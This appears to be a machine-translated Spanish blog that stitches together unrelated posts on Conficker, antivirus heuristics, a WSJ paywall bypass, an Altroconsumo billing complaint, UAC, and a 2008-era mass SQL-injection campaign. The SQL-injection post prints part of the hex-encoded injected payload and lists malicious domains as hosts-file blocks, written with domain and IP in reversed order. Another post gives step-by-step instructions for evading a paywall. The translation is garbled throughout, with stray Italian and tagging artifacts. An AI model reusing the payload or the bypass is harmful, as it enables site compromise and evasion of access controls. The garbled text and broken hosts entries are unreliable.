Alessandro Zanello

La base antivirusattuali su capacidad para captar el reconocimiento de firmas de virus (el reconocimiento de un fragmento de código típico de un virus específico), sino también, dada la frecuencia de los virus polimórficos (que cambian de forma aleatoria una parte de su código) en las técnicas heurísticas, es decir, Reconocimiento de comportamientos maliciosos.

En otras palabras, un programa que reconoce las contraseñas decodificandole para el acceso a los sitios de su programa de transferencia FTP, probablemente serían etiquetados como infectados por lo menos la mitad de los antivirus disponibles. Y si el exe se ha cifrado para la defensa y / o comprimidos para identificar como una amenaza es evidente, por lo general con las palabras típicas "probablemente una variante de Win32.Hack" o algo similar.

El virus de hoy en día no son como solían ser, que cuando se dijo que era un virus por lo que era.

más »

Actualización: Para saber si usted está infectado basta con crear una cuenta gratuita en OpenDNS y entrar. Una pancarta le avisará si es requerido por la red comenzar a "sospechoso" que lo identifique a usted como infectados por el gusano.

Vamos a preparar al 1 de abril, fecha en la fatídica Conficker / Downadup / Kido en su tercera versión debe comenzar a hacer un nuevo intento de dañar a millones de computadoras. Parece que la amenaza es seria, o al menos anti-virus compañías de software como Symantec y CA le dan crédito.

En primer lugar, actualizar el sistema operativo, vaya al sitio de Microsoft y la descarga de los parches de seguridad relacionados con este riesgo (Microsoft MS08-067) para nuestra versión del sistema operativo (por ejemplo, Windows XP SP2, Microsoft ® página de aquí , una copia local de archivo ya está aquí ).

El gusano Conficker.C ha sido diseñado para bloquear el acceso a sitios de seguridad, tales como actualizaciones de Microsoft y de seguridad de gran empresa de software anti-malware, incluyendo California. Una vez infectado el PC se ve afectada su configuración de seguridad, alterando el registro, borrar y desactivar de forma permanente los servicios que son puntos importantes de la "Restauración de la configuración del sistema" con el fin de evitar que la víctima se despierta a un sistema anterior infectado.

A continuación, nos aseguran que nuestro antivirus se actualiza, por si acaso hay aquí varios recursos para el reconocimiento y la eliminación del gusano.

Para más información, visite aquí , o para obtener un mayor lote en este sitio .

El virus Conficker plantea nuevos retos a los expertos en seguridad: dispositivos extraíbles infectados con el truco del virus el usuario y make install del gusano.

La puesta en marcha automática de Vista e incluso la nueva versión de Windows 7 automáticamente la búsqueda de programas en discos extraíbles.

El virus, sin embargo, utilizando un archivo AUTORUN.INF manipulado para hacer morphing riconoscibile no son fáciles de interceptar a este proceso y se disfraza como una carpeta para abrir, utilizando técnicas de ingeniería social, (ver imagen de arriba): cuando se hace clic opción, el gusano se instala.

Desde la imagen de arriba vemos que hay dos voces que dicen que ya sea "Abrir carpeta para ver archivos".

Que la mayoría de alta en la realidad es ficticia: el curso está programado en la ventana que aparece cuando se inserta un dispositivo extraíble, encontrar más detalles en este artículo de F-Secure.

Un interesante artículo sobre Conficker y cómo es claro aquí , en bleepingcomputer.com .

Una herramienta para eliminar Conficker es anti-Downadup Herramienta de BitDefender (tienes que descargarlo de una pera pc ² o no infectado, el gusano se le impida ponerse en contacto con el sitio).

más »

La presencia del icono de la llave en frente de un artículo del WSJ implica que este solo está disponible para los abonados.

Pera ² Si instalar y activar la extensión en el Agente de Usuario de Firefox, que te permite abrir el navegador Firefox como si se tratara de otro navegador (Opera, IE, Safari, etc.) Y registrarse como un agente genérico Blackberry nueva, por por ejemplo. con esta cadena:

BlackBerry8300/4.2.2Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107UP.Link/6.2.3.15.0

y luego en el artículo antepuesto (http://online.wsj.com/article/SB122710109269040789.html decirlo) el prólogo lo siguiente:

http://mobile2.wsj.com/device/article.php?mid=&CALL_URL =

la obtención de un total de:

entonces podrás ver la versión móvil, que es gratuito (por ahora y dura tanto como usted), incluso para los no abonados.

Para facilitar esto, una marca registrada marcar esta dirección, la entrada "Leer el artículo del WSJ":

Se trata de un bookmarklet, una aplicación de nano-javascript que toma la dirección actual (debe estar en el "restringido", uno para los no abonados), y dijo que el prepende prólogo.

Básicamente tenemos una manera de pretender ser un teléfono móvil y luego leer la versión gratuita de artículos.

Suscriptor durante muchos años para Altroconsumo, se registra en el fastidio y preocupación por su hábito de proponer el pago del gobierno con una fórmula, vagamente opresiva.

Se trata de una cuestión de elegir entre pagar la suscripción con un pago de servicios postales en la cantidad de 116.60 euros, o para recibir un descuento del 25% y pagar con tarjeta de crédito o débito c / c bancaria u oficina de correos ( RID) la suma de 87,45 euros.

Extrañamente, las tarjetas VISA Electron, como no son bienvenidos ", ya que debe gatear, pero puede tratar". Esto, obviamente, no garantizan la solvencia de la carga en los próximos plazos.

La explicación oficial de que el descuento es que estos métodos permiten Altroconsumo y luego guardarlos feliz, ampliar la ventaja a los usuarios. Así que lo que justifica las prácticas de las oficinas de suscripción para entender mejor que llaman.

Hermoso.

Sin embargo, muy poca credibilidad: si se recibe a través de euros 116,60 c / c postale costaría 29.15 euros, tanto directa como incidental como los costos y la organización, nadie en Italia se utiliza este método de recolección.

En otras palabras Altroconsumo ve a su audiencia como una pradera en la que quiere el dominio absoluto de la carga: nosotros existimos para financiar dichos proyectos y que generosamente se esforzará para proteger nuestros intereses.

Por el contrario, el consumidor tratado por años de abusos, hizo sospechoso por ahora todos los días del fraude y publicidad engañosa de los defensores de los consumidores, y corroborada por los informes de otros usuarios desconcertados:

Tenga cuidado con los Altroconsumo

Desconfíe Altroconsumo

El Altroconsumo estafa - 1

El Altroconsumo estafa - 2

elegir la respuesta única y verdadera posible de ciudadanos, los rebeldes y decide, después de años y años de suscripciones (no sólo, sino también para Altroconsumo Salutest y Dinero y Derechos) que tal actitud no es digna de una asociación que se dice en la defensa Los consumidores, que también estaba en perfecta buena fe.

La sospecha es en realidad perjudicial para la reputación de la propia asociación y socava su credibilidad. Como un consumidor que trate de defenderme y no a alguien que pague un impuesto al consumo más, sin ningún control y sólo pudiera protestar de forma retrospectiva, si me doy cuenta, por un cargo no deseado.

Así que, adiós Altroconsumo, gracias por enseñarme a defenderme.

Adición: si usted desea seguir disfrutando de el lado positivo de Altroconsumo sin sentirse en peligro, la solución es elegir la carga de la RID, que a menudo se gestiona de forma independiente a través del Home Banking, y luego, tan pronto como sea recibido y comprobado la acusación de " de suscripción, desactive el RID autorizado. Para cada suscripción vence usted será contactado por Altroconsumo, incapaz de tomar el cargo, y usted tiene una oportunidad real para renovar o cancelar su suscripción.

User Account Control (UAC) es un nuevo conjunto de tecnologías de infraestructura que permitan una mejor administración de escritorios al tiempo que reduce el impacto del malware en el sistema. Si la función está activada en Windows Vista, todos los usuarios, incluyendo administradores, iniciar sesión con una cuenta de usuario estándar. Los administradores pueden iniciar de forma selectiva las aplicaciones administrativas pueden usar los privilegios de la cuenta sólo cuando sea necesario. Cuando los usuarios con privilegios de acceso a su cuenta, inicie sesión en el entorno Realte de una cuenta de usuario estándar, pero pueden ejecutar sus aplicaciones con privilegios completos después de su aprobación. De forma predeterminada, las versiones actuales de Windows configurar la mayoría de las cuentas de usuario como miembros del grupo Administradores. Este es un grave riesgo de seguridad porque los productores de malware son más capaces de hacerse con el control de los sistemas conectados. Con la característica UAC, Windows Vista separa los privilegios de usuario estándar y las actividades de la administración, lo que reduce las posibilidades de ataque.

más »

Parece ser que millones de sitios web comprometidos por un ataque como "inyección SQL" que se inserta código malicioso en las páginas web en ASP (Active Server Pages lenguaje de scripting de la plataforma de Microsoft) modificado para que la descarga de un troyano en los ordenadores de los navegantes desprevenidos.

El código inyectado se cifra y se inicia así:

DECLARO% 20 @% S 20NVARCHAR (4000); SET% 20 @ S = REPARTO (0A-4400450
043004C004100520045002000400054002000760061007200630068006
1007200280032003500350029002C00400043002000760061007200630
06800610072002800320035003500290020004400450043004C0041005
200450020005400610062006C0065005F0043007500720073006F00720
0200043005500520053004F005200200046004F0052002000730065006
C00650063007400200061002E006E0061006D0065002C0062002E006E0
061006D0065002000660072006F006D0020007300790073006F0062006
A006500630074007300200061002C0073007900730063006F006C00750
06D006E00730020006200200077006800650072006500200061002E006
90064003D0062002E0069006400200061006E006400200061002E00780
074007900700065003D00270075002700200061006E006400200028006
2002E00780074007900700065003D003900390020006F0072002000620
02E00780074007900700065003D003300350020006â € |

Una vez descodificados aspecto como este:

DECLARE @ T varchar (255) @ C varchar (255) DECLARE Table_Cursor
CURSOR PARA b.name a.name seleccione de sysobjects a, b syscolumns
donde a.id = b.id y a.xtype u = y (b.xtype b.xtype o = 99 = 35
o b

Buscar con Google cadenas www.nihaorr1.com/1.js~~HEAD=NNS o www.banner82.com/b.js www.adw95.com/b.js~~HEAD=NNS son miles de sitios, divididos en dos categorías: los que hablan de los infección, en especial de programación ASP foro, y aquellos que han instalado el troyano.

El software (un procedimiento en JavaScript) no se carga directamente en el sitio en peligro, pero sí abrir el navegador en un marco volador invisible que apunta a un sitio remoto, una de las tres por encima de ejemplo mencionado: es la última que se descarga a su PC víctima del virus en sí mismo.

Algunos agujeros de seguridad que el virus intenta explotar la instalación del troyano (es por eso que es una buena idea para permitir la actualización automática del sistema operativo!)

MS06-014 Vulnerabilidad en el Microsoft Data Access Components (MDAC) podría permitir la ejecución de código

MS07-004 Una vulnerabilidad en el lenguaje de marcado vectorial podría permitir la ejecución remota de código

MS07-018 Vulnerabilidades en Microsoft Content Management Server podrían permitir la ejecución remota de código

MS07-033 Actualización de seguridad acumulativa para Internet Explorer

MS07-055 Una vulnerabilidad en el visor de imágenes Kodak podría permitir la ejecución remota de código

) ed inserirvi un reindirizzamento sul proprio PC (localhost) che renda inoffensivi gli indirizzi dei siti malevoli, ad es. Aparte de la limpieza de los sitios Web de sus directivos, ¿qué se puede hacer personalmente es para abrir con el Bloc de notas (notepad.exe) archivo de hosts (ubicado en c: \ windows \ system32 \ drivers \ etc \ hosts ) e insertar un redireccionamiento en su PC (localhost) que hace inofensivas las direcciones de los sitios maliciosos, por ejemplo. líneas:

www.nihaorr1.com 127.0.0.1
www.adw95.com 127.0.0.1
www.banner82.com 127.0.0.1
nmidahena.com 127.0.0.1
aspder.com 127.0.0.1

Los lugares en cuestión no será tan alcanzable, por supuesto, los identificados hasta ahora.

Basta ya de que los nuevos sitios web están siendo explotados por los troyanos y empezar de nuevo, así que la mejor solución es utilizar un buen antivirus.

Los sitios comprometidos son muchos, muchos italianos son los siguientes: hay sitios institucionales (municipios, provincias y organizaciones), los sitios privados y de comercio electrónico.

Inmediatamente viene a la mente a pesar de que estas mismas técnicas también pueden ser utilizados para otros fines: para evitar la aparición de ventanas publicitarias no deseadas durante la navegación, evitar que los niños revoltosos para llegar a los sitios que se consideran inadecuados, etc.

Encuentra aquí una lista de dominios para ser bloqueado por la técnica de la máquina local.

(Fuente: PandaLabs y www.f-secure.com )